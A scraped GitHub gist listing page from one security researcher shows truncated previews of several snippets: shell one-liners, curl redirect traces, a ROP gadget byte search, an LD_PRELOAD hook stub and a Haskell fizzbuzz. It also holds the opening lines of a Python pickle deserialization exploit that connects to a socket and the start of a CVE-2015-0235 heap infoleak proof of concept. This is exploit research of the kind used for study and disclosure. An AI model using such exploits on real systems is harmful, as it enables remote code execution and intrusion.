This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ while read; do echo -n "$REPLY" | od -tx1z; done | |
| hoge | |
| 0000000 68 6f 67 65 >hoge< | |
| 0000004 | |
| fuga | |
| 0000000 66 75 67 61 >fuga< | |
| 0000004 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ grep -boa $'\xc9\xc3' a.out | awk -F: '{printf "0x%x\n", $1}' # leave; ret | |
| 0x401 | |
| 0x466 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ curl -IL http://t.co/kzZyfMkRFl | |
| HTTP/1.1 301 Moved Permanently | |
| cache-control: private,max-age=300 | |
| content-length: 0 | |
| date: Mon, 21 Jul 2014 13:32:44 GMT | |
| expires: Mon, 21 Jul 2014 13:37:44 GMT | |
| location: http://htn.to/jKGE4e | |
| server: tfe | |
| set-cookie: muc=a00e470a-8304-4e1d-b87d-597a02b0a98f;Domain=t.co;Expires=Sat, 02-Jul-2016 13:32:44 GMT |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| compile: | |
| $ gcc -shared -fPIC -o hook.so hook.c -ldl | |
| */ | |
| #define _GNU_SOURCE | |
| #include <dlfcn.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <netdb.h> |
inaz2
/ gist:7fa449859a35e15b2a8b
Last active
August 29, 2015 14:06
case of ad redirection from expired domain
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ curl -v -L -A "Mozilla/5.0" http://www.unoh.net/ | |
| * STATE: INIT => CONNECT handle 0x60002d130; line 998 (connection #-5000) | |
| * About to connect() to www.unoh.net port 80 (#0) | |
| * Trying 109.201.133.191... | |
| * Adding handle: conn: 0x600069370 | |
| * Adding handle: send: 0 | |
| * Adding handle: recv: 0 | |
| * Curl_addHandleToPipeline: length: 1 | |
| * 0x60002d130 is at send pipe head! | |
| * - Conn 0 (0x600069370) send_pipe: 1, recv_pipe: 0 |
inaz2
/ exploiting-pickle.py
Last active
August 29, 2015 14:08
https://blog.nelhage.com/2011/03/exploiting-pickle/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import cPickle | |
| import subprocess | |
| import base64 | |
| import socket | |
| s = socket.create_connection(('localhost', 5000)) | |
| class Exploit(object): | |
| def __reduce__(self): | |
| fd = s.fileno() |
inaz2
/ infoleak.c
Last active
September 28, 2016 06:21
CVE-2015-0235 heap chunk size overwrite / http://www.openwall.com/lists/oss-security/2015/01/27/9
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| int main() | |
| { | |
| /* preparation */ | |
| char *p1 = malloc(0x100); | |
| char *p2 = malloc(0x100); | |
| char *p3 = malloc(0x100); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import Control.Monad | |
| main = | |
| forM_ [1..100] $ \x -> do | |
| if x `mod` 15 == 0 then | |
| putStrLn "fizzbuzz" | |
| else if x `mod` 5 == 0 then | |
| putStrLn "buzz" | |
| else if x `mod` 3 == 0 then | |
| putStrLn "fizz" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # lsb_release -a | |
| No LSB modules are available. | |
| Distributor ID: Ubuntu | |
| Description: Ubuntu 12.04.5 LTS | |
| Release: 12.04 | |
| Codename: precise | |
| # /lib/x86_64-linux-gnu/libc.so.6 | |
| GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.6) stable release version 2.15, by Roland McGrath et al. | |
| Copyright (C) 2012 Free Software Foundation, Inc. |
inaz2
/ env.txt
Last active
August 29, 2015 14:15
crash in PHP 5 ereg() function / Full disclosure: heap overflow in H. Spencer’s regex library on 32 bit systems https://guidovranken.wordpress.com/2015/02/04/full-disclosure-heap-overflow-in-h-spencers-regex-library-on-32-bit-systems/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ uname -a | |
| Linux vm-ubuntu32 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux | |
| $ lsb_release -a | |
| No LSB modules are available. | |
| Distributor ID: Ubuntu | |
| Description: Ubuntu 14.04.1 LTS | |
| Release: 14.04 | |
| Codename: trusty |